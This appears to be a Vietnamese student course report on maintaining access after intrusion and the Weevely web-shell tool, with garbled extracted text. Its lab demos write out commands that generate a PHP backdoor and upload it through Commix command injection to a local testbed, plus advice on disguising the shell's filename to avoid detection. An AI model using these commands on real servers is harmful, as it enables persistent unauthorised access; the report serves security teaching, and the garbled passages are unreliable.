1. Trang chủ
  2. » Giáo Dục - Đào Tạo

HỌC PHẦN: AN TOÀN MẠNG BÁO CÁO CUỐI KỲ Đề tài: Tìm hiểu duy trì đăng nhập và công cụ Weevely

72 10 0

Đang tải... (xem toàn văn)

Tài liệu hạn chế xem trước, để xem đầy đủ mời bạn chọn Tải xuống

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 72
Dung lượng 2,44 MB

Nội dung

HỌC VIỆN CƠNG NGHỆ BƯU CHÍNH VIỄN THƠNG KHOA CƠNG NGHỆ THÔNG TIN I -& - HỌC PHẦN: AN TOÀN MẠNG BÁO CÁO CUỐI KỲ Đề tài: Tìm hiểu trì đăng nhập cơng cụ Weevely Giảng viên: Họ tên: Mã sinh viên: Lớp: Nhóm mơn học: TS Đặng Minh Tuấn Đặng Minh Hồng B18DCAT097 D18CQAT01-B 01 Hà Nội, 2021 I CẢM Tr t mxn yt l n N t ns us n GS Đặng Minh Tuấn n t ntn n n o p m tron su t qu tr n t n tiểu lu n m n Em x n l m n n t n t thầy ịn ng ch ề p em q trình học mơn An toàn mạng Em c m n t ầy sẻ ki n thức bổ í ể em hồn thành tiểu lu n c a mình./ Em x n tr n trọn m n! DANH MỤC CÁC TỪ VIẾT TẮT Từ viết tắt Viết đầy đủ Ý nghĩa AES Advanced Encryption Standard Chuẩn mã hóa cấp cao ARP Address Resolution Protocol Giao thứ ch mạng DHCP Dynamic Host Configuration Protocol Giao thức cấu hình máy ch DNS Domain Name System H th ng phân gi i tên miền FTP File Transfer Protocol Giao thức truyền t i t p tin GNU General Public License Giấy phép Công cộng HTTP HyperText Transfer Protocol Giao thức truyền t i siêu văn n HTTPs Hyper Text Transfer Protocol Secure Giao thức truyền t i siêu văn n b o m t ICMP Internet Control Message Protocol Giao thức x lý thông báo trạng thái cho ịa ch IP ID Identification nh n dạng IDS Intrusion Detection System H th ng Phát hi n Xâm ín x ịa nh p IoT Internet of Things Internet vạn v t MAC Media Access Control Kiểm soát truy c p p n t n truyền thông PAM Privileged Access Management Qu n lý truy c p ặc quyền SIEM Security Information and Event Management Qu n Lý Log Và S Ki n T p Trung SQL Structured Query Language Ngôn ngữ truy vấn li u SSH Giao thứ ều khiển từ x o p ép n i dùng kiểm soát ch nh s a Secure Shell server từ xa qua Internet TCP Transmission Control Protocol Giao thứ ều khiển truyền v n TOTP time-based one-time password M t s dụng lần UDP User Datagram Protocol Giao thức gói li u n i dùng 2FA Two-factor authentication Xác th c y u t DANH MỤC HÌNH Hình 1: Leo thang đặc quyền theo chiều dọc chiều ngang 22 Hình 2: Sơ đồ chuỗi công 24 Hình 3: Cơng cụ Weevely 41 Hình 4: Cơng cụ Weevely 42 Hình 5: Cảnh báo cửa sổ dòng lệnh 43 Hình 6: Lệnh help 43 Hình 7: Thơng báo lỗi 44 Hình 8: Tạo user password 44 Hình 9: Ví dụ tên thư mục 44 Hình 10: Weevely máy chủ web với máy chủ Kali Linux 45 Hình 11: Thả tệp thư mục webroot 45 Hình 12: Thử nghiệm máy web Kali 46 Hình 13: Thu thập thơng tin hệ thống 49 Hình 14: Lệnh file_ls 49 Hình 15: Giải thích lệnh Ls 50 Hình 16: Lệnh file_ls thư mục 50 Hình 17: Thao tác mở tệp 51 Hình 18: Thao tác ghi tệp 51 Hình 19: Từ chối tải tệp lên 51 Hình 20: That đổi mục 52 Hình 21: Cài đặt Weevely 53 Hình 22: Thơng tin phiên mẫu lệnh 53 Hình 23: Tạo file backdoor 55 Hình 24: Tạo file backdoor thành công 55 Hình 25: Truy cập tài khoản quản trị viên 56 Hình 26: Tải file backdoor lên trình quản lý file 56 Hình 27: Tải file lên thành công 57 Hình 28: Kiểm tra file tải lên thành công 57 Hình 29: Kết nối backdoor 58 Hình 30: Liệt kê file trang web 59 Hình 31: Cài đặt commix 61 Hình 32: Clone Commix Testbed từ github 62 Hình 33: Khởi động Docker kéo vào Commix Testbed 64 Hình 34: Thư mục Documents 64 Hình 35: File backdoor weevely.php 64 Hình 36: Tải backdoor lên Commix 65 Hình 37: Cảnh báo HTTP 66 Hình 38: Nhật ký Apache 67 Hình 39: Thực thi tập lệnh từ xa Weevely 69 Hình 40: Đặt tên tệp để không bị phát 70 DANH MỤC BẢNG Bảng 1: Các lệnh sử dụng dùng câu lệnh help 46 Bảng 2: Các lệnh thực với shell 48 MỤC LỤC I CẢM N DANH MỤC CÁC TỪ VIẾT TẮT DANH MỤC HÌNH DANH MỤC BẢNG I L I MỞ ĐẦU 11 II LÝ THUYẾT VÀ THỬ NGHIỆM 12 Chương 1: TỔNG QUAN VỀ DUY TRÌ ĐĂNG NHẬP 12 Định nghĩa trì đăng nhập 12 Cách để trì đăng nhập 12 2.1 Tàng hình 13 2.2 Leo thang đặc quyền 14 2.3 Backdoor 14 2.4 Che giấu vết tích 15 2.5 Hacker có tâm giành trì quyền truy cập 16 Tàng hình 17 3.1 Tổng quát 17 3.2 Quét khơng tàng hình gì? 17 3.3 Kỹ thuật trinh sát mạng tàng hình gì? 18 3.3.1 Ánh xạ ngược 18 3.3.2 Quét chậm 18 3.3.3 Quét nửa mở 19 3.3.4 Quét FIN 19 3.3.5 Quét X-mas 19 3.4 Một số kỹ thuật quét tàng hình? 20 3.4.1 Phân mảnh 20 3.4.2 Giả mạo 20 3.4.3 Ngụy trang 21 3.4.4 Nhảy 21 3.5 Kết luận 21 eo thang đặc quyền 21 4.1 Leo thang đặc quyền gì? 21 4.2 Leo thang đặc quyền hoạt động nào? 23 4.3 Tấn cơng leo thang đặc quyền gì? 24 4.4 Các phương pháp công leo thang đặc quyền phổ biến 25 4.4.1 Khai thác thông tin xác thực 25 4.4.2 Các lỗ hổng khai thác đặc quyền 26 4.4.3 Cấu hình sai 29 4.4.4 Phần mềm độc hại 30 4.4.5 Kỹ thuật xã hội 31 4.5 Cách ngăn chặn giảm thiểu công leo thang đặc quyền 32 Backdoor 33 5.1 Backdoor hoạt động nào? 34 5.2 Các công backdoor hoạt động nào? 34 5.3 Bạn bị cơng backdoor khơng? 36 5.4 Các cách tốt để ngăn chặn công backdoor 37 Che giấu vết tích 39 Chương 2: TÌM HIỂU CƠNG CỤ WEEVELY 41 Định nghĩa Weevely 41 Đặc trưng Weevely 41 Hướng dẫn sơ Weevely 42 3.1 Chuẩn bị để sử dụng Weevely 43 3.2 Tạo tác nhân 44 3.3 Thử nghiệm Weevely nội 44 3.4 Thử nghiệm Weevely máy chủ Windows 45 3.5 Trợ giúp Weevely 46 3.6 Lấy thông tin hệ thống 48 3.7 Sử dụng lệnh hệ thống tệp Weevely 49 Cài đặt Weevely 52 Chương 3: THỬ NGHIỆM CÔNG CỤ WEEVELY 54 Demo sử dụng Weevely tạo backdoor Wordpress 54 1.1 Môi trường 54 1.2 Kịch 54 1.3 Tiến hành thử nghiệm 54 Demo sử dụng Weevely kết hợp Commix để tạo tải lên backdoor 59 2.1 Giới thiệu sơ qua công cụ Commix 59 2.2 Các kỹ thuật công hỗ trợ 60 2.3 Cài đặt công cụ 61 2.4 Môi trường 61 2.5 Kịch 62 2.6 Tiến hành thử nghiệm 63 Kết luận thử nghiệm việc tạo backdoor với Weevely 69 III KẾT LUẬN 71 LINK VIDEO BÀI THỬ NGHIỆM 71 DANH MỤC TÀI LIỆU THAM KHẢO 72 10 Hình 29: Kết nối backdoor Bước 4: Khai thác Từ y t ó t ể tùy ý th c hi n câu l nh shell, modul v quyền cao Ví dụ: ls: li t kê file có trang web 58 ặc Hình 30: Liệt kê file trang web Demo sử dụng Weevely kết hợp Commix để tạo tải lên backdoor 2.1 Giới thiệu sơ qua công cụ Commix Commix (là từ vi t t t c a [Comm] and [i]njection e[x]ploiter - trình khai thác chèn l n ) Đ y l l công cụ kiểm tra thâm nh p mã nguồn mở (open sourse pen-t st tool) ợc vi t Anastasios Stasinopoulos, hỗ trợ vi c t ộng hóa vi c phát hi n khai thác lỗ hổng chèn l nh B n quyền công cụ từ năm 2014 n th ểm hi n thuộc tác gi An st s os St s nopoulos C n tr n n y l p ần mềm miễn p í: n i dùng phân ph i lại và/hoặc s ổ t o ều kho n c a Giấy phép Công cộng GNU Tổ chức Phần mềm T (Free Software Foundation) xuất b n, phiên b n c a Giấy phép phiên b n m n Nhữn ặc tính b t (theo công b c a trang ch công cụ): Cơng cụ có s ặc tính b t v n i s dụn n s u: - Dễ s dụng: T ộng hóa vi c phát hi n khai thác lỗ hổng chèn l nh (các) tham s dễ bị công và/hoặc HTTP header - Tín ộng cao Tồn thành phần cần thi t ể th c hi n công chèn l nh ch ng lại nhiều loại h ều hành ứng dụn ều ợc tích hợp cơng cụ - Tính mơ- un ó : N i dùng phát triển dễ dàng nh p môun r ên m n ể tăn k năn công c a commix và/hoặ ều ch nh theo nhu cầu c a họ - Tín t n t í éo Comm x t n t í v i nhiều công cụ kiểm tra thâm nh p k n : Metasploit Framework Burp-suite, SQLMap, vv, ó tỷ l phát hi n v k t t n ôn ợ tăn o - Tín t n : Comm x ợc vi t bằn Pyt on Pyt on ể chạy tất c t ng - Miễn phí mã nguồn mở o ó Trang ch cơng cụ: https://commixproject.com Trang github c a công cụ: https://github.com/commixproject/commix 59 yêu cầu 2.2 Các kỹ thuật công hỗ trợ Commix hỗ trợ phát hi n khai thác dạng công chèn l nh sau: - Tấn công chèn lệnh dựa kết (Results-based): Trong công chèn l nh d a k t qu , kẻ cơng tr c ti p suy k t qu c a l n ợ v o t ôn qu p n hồi c a ứng dụng web Các công chèn l nh d a k t qu ợc chia thành hai kỹ thu t:  Tấn công chèn lệnh dựa kết (cổ điển): Kỹ thu t cổ ển kiểu ôn n n phổ bi n Cụ thể n kẻ cơng s dụng s tốn t phổ bi n, ghép l nh g n ầu v i l n ợ v o oặc loại trừ l nh g n ầu ch th c hi n l n ợ v o  Shellshock: Lỗ S lls o k ợc phát hi n Bash, công cụ ợc s dụng rộng rãi h ều hành Unix nhiều bi n thể c a nó, bao gồm phần mềm nguồn mở Linux OS X c a Apple  Lọc ICMP (ICMP exfiltration)  Lọc DNS  Kỹ thuật đánh giá mã động (Tấn công chèn lệnh dựa đánh giá): Vi c chèn l n t ôn qu n m ộng diễn ứng dụng dễ bị công s dụng hàm eval(), hàm n y ợc s dụn ể th t ộn m ợc chuyển (t i hàm eval() th i gian chạy H m v l() ợc cung cấp nhiều ngôn ngữ thông dị n Java, Javascript, Python, Perl, PHP Ruby - Tấn công chèn lệnh mù (Blind): S khác bi t công chèn l nh d a k t qu công chèn l nh mù nằm cách li u ợc truy xuất sau th c hi n l n s ll ợ v o Cụ thể n ó n ữn tr ng hợp ứng dụng sau th c hi n l n ợc tr vào không tr lại k t qu cho kẻ công Trong ng hợp này, kẻ cơng gián ti p suy k t qu c a l n ợc v o ằng cách s dụng hai kỹ thu t sau:  Time-based (Blind): D a th i gian (Mù): Thông qua kỹ thu t này, kẻ công chèn th c hi n l n ể hiển thị ộ trễ th i gian Bằn o t i gian ứng dụng ph n hồi, kẻ công x ịnh xem l n ợc th c thi thành công hay thất bại Chức 60 năn tron B s s ll ó t ể gi i thi u ộ trễ th i gian ch ộ ng o ó ằn qu n s t ộ trễ th i gian, kẻ cơng suy k t qu c a l n ợ v o  File-based (SemiBlind): D a t p tin (B n mù): Kỹ thu t d a logic n n kẻ công quan sát k t qu th c hi n l n ợ v o t kẻ cơng ghi chúng vào t p mà hãn truy c p ợc 2.3 Cài đặt công cụ - Mô tr n ặt: Kali Linux 2021.1 - Các yêu cầu tr k ặt: M y Pyt on 2.6 2.7 oặc 3.x - Ti n n ặt: T i Commix máy từ trang github Hình 31: Cài đặt commix 2.4 - Mô tr Môi trường ng dùng cho th c hành bao gồm máy o Kali Linux 61 - Máy o K l L nux ó ịa ch IP192.168.175.128 - Máy o K l l nux ợ ặt Python 3, Commix, Docker Weevely - Mô tr n Comm x T st : Comm x T st l mô tr n ợc tạo dành riêng cho vi c th nghi m OS Command Injection tạo r mô tr ng v i gần n to n ộ lỗ hổn OS Comm n Inj t on o n th ểm hi n Do nhữn ặc tính trộ ó t nghi m ợc th c hi n mô tr ng Comm x T st Comm x T st ợ ặt cách clone từ github theo ng d n: https://github.com/commixproject/commix-testbed Hình 32: Clone Commix Testbed từ github 2.5 ôn Kịch Sau kẻ ôn t m ợc lỗ hổng OS Command injection Kẻ t c hi n thành công cơng vào lỗ hổn ó B y kẻ công ti n hành tạo backdoor t k oor ó lên mục tiêu ơn 62 ợc Ở demo này, s dụng môi tr chứa lỗ hổn ể công 2.6 n Comm x T st ể l m mô tr ng Tiến hành thử nghiệm Bước 1: Khởi động môi trường chứa lỗ hổng Bây gi bi t s dụng cơng cụ mụ í a chúng gì, b t ầu khở ộn mơ tr ng chứa lỗ hổng c a mà khai thác cách an toàn hợp pháp Đ iv ều này, s dụng vùng chứa Docker chúng dễ t i lên g xu ng chạy chúng máy o riêng bi t chạy h ều hành mà l a chọn Bây gi khở ộn Do k r v kéo v o tron mô tr Commix Testbed:  Docker run –rm –d –p 3000:80 commixproject/commix-testbed 63 ng Hình 33: Khởi động Docker kéo vào Commix Testbed Bước 2: Tạo file backdoor Weevely Chúng ta s dụng s dụng c a sổ cmd m mục Documents ể tạo file backdoor Hình 34: Thư mục Documents S u ó y tạo backdoor Weevely l nh:  weevely generate commix weevely.php Thao tác tạo t p t n w v ly.p p tron t mục hi n c a v i m t l omm x Để xem nội dung, gõ:  cat weevely.php Hình 35: File backdoor weevely.php 64 N ạn thấy, mã bị xáo trộn t ôn qu m thứ tạo c a sau c a ó n n m n y Nhữn n i tạo Weevely gọ y l t n n s uv y l t p mà mu n t lên t mụ w í S u k ợc t lên t mục web í n t yêu cầu máy ch web th t m PHP ó l m un ấp cho có quyền truy c p từ xa Vì v y, tác nhân ph i truy c p ợc từ URL mà bạn có quyền truy c p, n u k ơn ều không hoạt ộng Bước 3: Tải backdoor lên Commix Ở y n t s dụng công cụ Comm x ể t i lên backdoor Chúng ta s dụng câu l n s u ể t i lên:  python3 commix.py url="http://127.0.0.1:3000/commixtestbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" fileupload="/home/kali/Documents/weevely.php" filedest="/var/www/example.com/public_html/commixtestbed/scenarios/regular/GET/" Hình 36: Tải backdoor lên Commix 65 V i l nh t i file backdoor lên mục tiêu (/var/www/example.com/public_html/commix-testbed/scenarios/regular/GET/) *Đ n y t nghi m bị lỗi HTTP, v y s u bày lý thuy t ể th c hi n n t th nghi m y m x n p ép tr n C n tr n h i li u có mu n kích hoạt máy ch HTTP tr l i Y S u ó n t nh n ợc c nh báo gi ng k t qu này: [warning] It seems that you don't have permissions to write the '/var/www/example.com/public_html/commixtestbed/scenarios/regular/GET/weevely.php' file Hình 37: Cảnh báo HTTP 66 Và t p k ôn v t k o n n t n ạy ứng dụng khơng có quyền thích hợp, thấy ều nh t ký Ap Đ ều cách quyền ợc thi t l p máy ch /vùng chứa Hình 38: Nhật ký Apache N u kh i nh t ký lỗi chạy ls -l, thấy t mục thuộc sở hữu c a root Mặc dù khơng khun bạn nên s dụng tài kho n root ể sở hữu t mục ứng dụn w n n tron tr ng hợp này, n ăn n t t i lên t p qua lỗ hổng command injection, v y ó l ều cần l u ý k n t k mp n pháp phịng th sau Quyền ón vai trị vi n ăn ặn ôn n n n ũn không nên bi n pháp b o v H y t y ổi quyền n y ể th c hi n vi c t i t p lên v i câu l nh: 67  chown -R www-data:www-data commix-testbed Bây gi , chạy lại công c a chúng ta:  python3 commix.py url="http://127.0.0.1:3000/commixtestbed/scenarios/regular/GET/classic.php?addr=INJECT_HERE" fileupload="/home/kali/Documents/weevely.php" filedest="/var/www/example.com/public_html/commixtestbed/scenarios/regular/GET/" Và ạt ợc mụ í k t ơn on y n lên: [info] The /var/www/example.com/public_html/commixtestbed/scenarios/regular/GET/weevely.php file was uploaded successfully! C n t t i tác nhân backdoor c a lên máy ch xác minh Pseudo-terminal:  ls weevely.php Bước 3: Kết nối với tác nhân backdoor Sau t i lên tác nhân backdoor, th c thi t p l nh Weevely từ h th ng c a mình:  weevely http://127.0.0.1:3000//commixtestbed/scenarios/regular/GET/weevely.php commix L u ý: omm x cu i m t s dụn 68 ể mã hóa t p Hình 39: Thực thi tập lệnh từ xa Weevely Gi y n t ó quyền truy c p shell vào máy ch /vùng chứa n u y k ôn p l mơ tr ng phịng thí nghi m, giữ quyền truy c p miễn nạn nhân c a không nh n r k oor n ó Kết luận thử nghiệm việc tạo backdoor với Weevely Xem xét t p 404.php hay weevely.php ch hàng nghìn t p h th ng, tùy thuộc vào mứ ộ phức tạp c a mục tiêu c a bạn, nạn nhân khơng bao gi tìm thấy t p Bạn th m chí t y ổi tên t p thành tên t p trộn l n nhiều n v o tron n n n t p khác Ví dụ: có loạt t p y t ầu classic_, v y bạn ặt tên classic_advanced_auth.php c a 69 v o n trăm t p t n t Hình 40: Đặt tên tệp để không bị phát 70 III KẾT LUẬN C n t cách s mô- un/tùy có kh n vừa khám phá cơng cụ t v i có tên Weevely dụng th c t tron mơ tr ng th nghi m Ch cần li t kê ọn Weevely cung cấp, hình dung cơng cụ năn Chúng ta thấy vi c s dụng công cụ W v ly ể tạo backdoor, k t n k oor s u k ợc t i lên lên máy ch web mục tiêu, th c hi n modul ể khai thác thông tin, s ổi, cơng Cơng cụ có sẵn kali t i về, dễ s dụng v ầy n n, dễ dàng ng d n chi ti t Cùng v ó n t ợc tìm hiểu bi t ển uy tr ăn n p – tron năm c quan trọng c a tin tặ ều ph tu n t o Đ y l nhữn c vô quan trọng tin tặ n ợc quyền truy c p vào h th ng mục tiêu, tin tặc chọn s dụng c h th ng tài nguyên c a ồng th i s dụng h th n n y n b p ón ể quét khai thác h th ng khác giữ cấu hình thấp ti p tục khai thác h th n Để làm ợc nhữn ều tin tặc cần trì truy c p thông su t không bị phát hi n V n t ợc bi t n qu v ịnh nghĩa tiểu lu n LINK VIDEO BÀI THỬ NGHIỆM - Demo s dụng Weevely tạo backdoor Wordpress: https://youtu.be/WST100ZVFqY - Demo s dụng Weevely k t hợp Comm x ể tạo t i lên backdoor: https://drive.google.com/file/d/1MGM0zA6qobQDGd8DmlO8D6_7q14J0uW/view?usp=sharing 71 DANH MỤC TÀI LIỆU THAM KHẢO Tài liệu tiếng nước Stefan Umit Uygur (2014), Penetration Testing with BackBox, PC Packt Publishing Ltd Wolf Halton, Bo Weaver, Juned Ahmed Ansari, Srinivasa Rao Kotipalli, Mohammed A.Imran (2016), Penetration Testing: A Survival Guide, PC Packt Publishing Ltd Leonard Chin (2016), Phases Every Hacker Must Follow Tài liệu trang web Lester Obbayi (2020), Ethical hacking: Stealthy network recon techniques, trang web https://resources.infosecinstitute.com/topic/ethical-hacking-stealthynetwork-recon-techniques/, (truy c p ngày 22/12/2021) Morey J Haber (2021), Privilege Escalation Attack and Defense Explained, trang web https://www.beyondtrust.com/blog/entry/privilege-escalation-attackdefense-explained, (truy c p ngày 22/12/2021) Ben Martens (2021), What Is a Backdoor & How to Prevent Backdoor Attacks, trang web https://www.safetydetectives.com/blog/what-is-abackdoor-and-how-to-protect-against-it/, (truy c p ngày 22/12/2021) Chritophe (2020), Uploading Backdoor Shells with Weevely and Commix, trang web, https://cybr.com/ethical-hackingarchives/uploading-backdoor-shells-with-weevely-andcommix/?fbclid=IwAR0EdYFycrwwuuF4hLN0tqMKA2aFj1iEXs0LBmMyi1zvdzF3N90raH3X9U, (truy c p ngày 22/12/2021) 72 ... a t t n 11 II LÝ THUYẾT VÀ THỬ NGHIỆM Chương 1: TỔNG QUAN VỀ DUY TRÌ ĐĂNG NHẬP Định nghĩa trì đăng nhập Khi h th ng bị xâm nh p, kẻ ôn ợc cấp quyền truy c p tạm th i vào h th n ó (k ơn o ồm dịch... ký, xóa t p nh t ký, loại b chứng, trồng công cụ bổ sung che dấu v t 40 Chương 2: TÌM HIỂU CƠNG CỤ WEEVELY Định nghĩa Weevely Hình 3: Cơng cụ Weevely Weevely s ll ợ vũ k í ó ó n ĩ l ợc thi t... DANH MỤC CÁC TỪ VIẾT TẮT DANH MỤC HÌNH DANH MỤC BẢNG I L I MỞ ĐẦU 11 II LÝ THUYẾT VÀ THỬ NGHIỆM 12 Chương 1: TỔNG QUAN VỀ DUY TRÌ ĐĂNG NHẬP

Ngày đăng: 09/02/2022, 13:39

TRÍCH ĐOẠN

TÀI LIỆU CÙNG NGƯỜI DÙNG

TÀI LIỆU LIÊN QUAN

w